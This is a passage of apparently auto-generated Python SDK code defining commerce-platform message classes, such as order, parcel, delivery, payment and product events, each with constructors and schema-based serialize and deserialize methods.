resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderEditApplied",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderEditAppliedMessage":
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().dump(self)
class OrderImportedMessage(Message):
order: "Order"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order: "Order"
):
self.order = order
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderImported",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderImportedMessage":
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().dump(self)
class OrderLineItemAddedMessage(Message):
line_item: "LineItem"
added_quantity: int
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item: "LineItem",
added_quantity: int
):
self.line_item = line_item
self.added_quantity = added_quantity
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderLineItemAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemAddedMessage":
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().dump(self)
class OrderLineItemDiscountSetMessage(Message):
line_item_id: str
discounted_price_per_quantity: typing.List["DiscountedLineItemPriceForQuantity"]
total_price: "Money"
taxed_price: typing.Optional["TaxedItemPrice"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
line_item_id: str,
discounted_price_per_quantity: typing.List[
"DiscountedLineItemPriceForQuantity"
],
total_price: "Money",
taxed_price: typing.Optional["TaxedItemPrice"] = None
):
self.line_item_id = line_item_id
self.discounted_price_per_quantity = discounted_price_per_quantity
self.total_price = total_price
self.taxed_price = taxed_price
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderLineItemDiscountSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderLineItemDiscountSetMessage":
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().dump(self)
class OrderPaymentStateChangedMessage(Message):
payment_state: "PaymentState"
old_payment_state: typing.Optional["PaymentState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment_state: "PaymentState",
old_payment_state: typing.Optional["PaymentState"] = None
):
self.payment_state = payment_state
self.old_payment_state = old_payment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderPaymentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderPaymentStateChangedMessage":
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().dump(self)
class OrderReturnInfoAddedMessage(Message):
return_info: "ReturnInfo"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
return_info: "ReturnInfo"
):
self.return_info = return_info
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ReturnInfoAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnInfoAddedMessage":
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().dump(self)
class OrderReturnShipmentStateChangedMessage(Message):
return_item_id: str
return_shipment_state: "ReturnShipmentState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
return_item_id: str,
return_shipment_state: "ReturnShipmentState"
):
self.return_item_id = return_item_id
self.return_shipment_state = return_shipment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderReturnShipmentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderReturnShipmentStateChangedMessage":
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().dump(self)
class OrderShipmentStateChangedMessage(Message):
shipment_state: "ShipmentState"
old_shipment_state: typing.Optional["ShipmentState"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipment_state: "ShipmentState",
old_shipment_state: typing.Optional["ShipmentState"] = None
):
self.shipment_state = shipment_state
self.old_shipment_state = old_shipment_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShipmentStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShipmentStateChangedMessage":
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().dump(self)
class OrderShippingAddressSetMessage(Message):
address: typing.Optional["Address"]
old_address: typing.Optional["Address"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: typing.Optional["Address"] = None,
old_address: typing.Optional["Address"] = None
):
self.address = address
self.old_address = old_address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingAddressSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingAddressSetMessage":
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().dump(self)
class OrderShippingInfoSetMessage(Message):
shipping_info: typing.Optional["ShippingInfo"]
old_shipping_info: typing.Optional["ShippingInfo"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipping_info: typing.Optional["ShippingInfo"] = None,
old_shipping_info: typing.Optional["ShippingInfo"] = None
):
self.shipping_info = shipping_info
self.old_shipping_info = old_shipping_info
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingInfoSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingInfoSetMessage":
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().dump(self)
class OrderShippingRateInputSetMessage(Message):
shipping_rate_input: typing.Optional["ShippingRateInput"]
old_shipping_rate_input: typing.Optional["ShippingRateInput"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
shipping_rate_input: typing.Optional["ShippingRateInput"] = None,
old_shipping_rate_input: typing.Optional["ShippingRateInput"] = None
):
self.shipping_rate_input = shipping_rate_input
self.old_shipping_rate_input = old_shipping_rate_input
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderShippingRateInputSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderShippingRateInputSetMessage":
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().dump(self)
class OrderStateChangedMessage(Message):
order_state: "OrderState"
old_order_state: "OrderState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
order_state: "OrderState",
old_order_state: "OrderState"
):
self.order_state = order_state
self.old_order_state = old_order_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateChangedMessage":
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().dump(self)
class OrderStateTransitionMessage(Message):
state: "StateReference"
old_state: typing.Optional["StateReference"]
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
old_state: typing.Optional["StateReference"] = None,
force: bool
):
self.state = state
self.old_state = old_state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "OrderStateTransitionMessage":
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().dump(self)
class OrderStoreSetMessage(Message):
store: "StoreKeyReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
store: "StoreKeyReference"
):
self.store = store
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="OrderStoreSet",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "OrderStoreSetMessage":
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().dump(self)
class ParcelAddedToDeliveryMessage(Message):
delivery: "Delivery"
parcel: "Parcel"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery: "Delivery",
parcel: "Parcel"
):
self.delivery = delivery
self.parcel = parcel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelAddedToDelivery",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelAddedToDeliveryMessage":
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().dump(self)
class ParcelItemsUpdatedMessage(Message):
parcel_id: str
delivery_id: typing.Optional[str]
items: typing.List["DeliveryItem"]
old_items: typing.List["DeliveryItem"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
parcel_id: str,
delivery_id: typing.Optional[str] = None,
items: typing.List["DeliveryItem"],
old_items: typing.List["DeliveryItem"]
):
self.parcel_id = parcel_id
self.delivery_id = delivery_id
self.items = items
self.old_items = old_items
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelItemsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelItemsUpdatedMessage":
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().dump(self)
class ParcelMeasurementsUpdatedMessage(Message):
delivery_id: str
parcel_id: str
measurements: typing.Optional["ParcelMeasurements"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel_id: str,
measurements: typing.Optional["ParcelMeasurements"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.measurements = measurements
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelMeasurementsUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelMeasurementsUpdatedMessage":
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().dump(self)
class ParcelRemovedFromDeliveryMessage(Message):
delivery_id: str
parcel: "Parcel"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel: "Parcel"
):
self.delivery_id = delivery_id
self.parcel = parcel
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelRemovedFromDelivery",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelRemovedFromDeliveryMessage":
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().dump(self)
class ParcelTrackingDataUpdatedMessage(Message):
delivery_id: str
parcel_id: str
tracking_data: typing.Optional["TrackingData"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
delivery_id: str,
parcel_id: str,
tracking_data: typing.Optional["TrackingData"] = None
):
self.delivery_id = delivery_id
self.parcel_id = parcel_id
self.tracking_data = tracking_data
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="ParcelTrackingDataUpdated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "ParcelTrackingDataUpdatedMessage":
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().dump(self)
class PaymentCreatedMessage(Message):
payment: "Payment"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment: "Payment"
):
self.payment = payment
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentCreated",
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "PaymentCreatedMessage":
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().dump(self)
class PaymentInteractionAddedMessage(Message):
interaction: "CustomFields"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
interaction: "CustomFields"
):
self.interaction = interaction
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentInteractionAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentInteractionAddedMessage":
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().dump(self)
class PaymentStatusInterfaceCodeSetMessage(Message):
payment_id: str
interface_code: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
payment_id: str,
interface_code: str
):
self.payment_id = payment_id
self.interface_code = interface_code
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentStatusInterfaceCodeSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusInterfaceCodeSetMessage":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().dump(self)
class PaymentStatusStateTransitionMessage(Message):
state: "StateReference"
force: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
state: "StateReference",
force: bool
):
self.state = state
self.force = force
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentStatusStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentStatusStateTransitionMessage":
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().dump(self)
class PaymentTransactionAddedMessage(Message):
transaction: "Transaction"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
transaction: "Transaction"
):
self.transaction = transaction
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentTransactionAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionAddedMessage":
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().dump(self)
class PaymentTransactionStateChangedMessage(Message):
transaction_id: str
state: "TransactionState"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
transaction_id: str,
state: "TransactionState"
):
self.transaction_id = transaction_id
self.state = state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="PaymentTransactionStateChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "PaymentTransactionStateChangedMessage":
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().dump(self)
class ProductAddedToCategoryMessage(Message):
category: "CategoryReference"
staged: bool
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "CategoryReference",
staged: bool
):
self.category = category
self.staged = staged
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
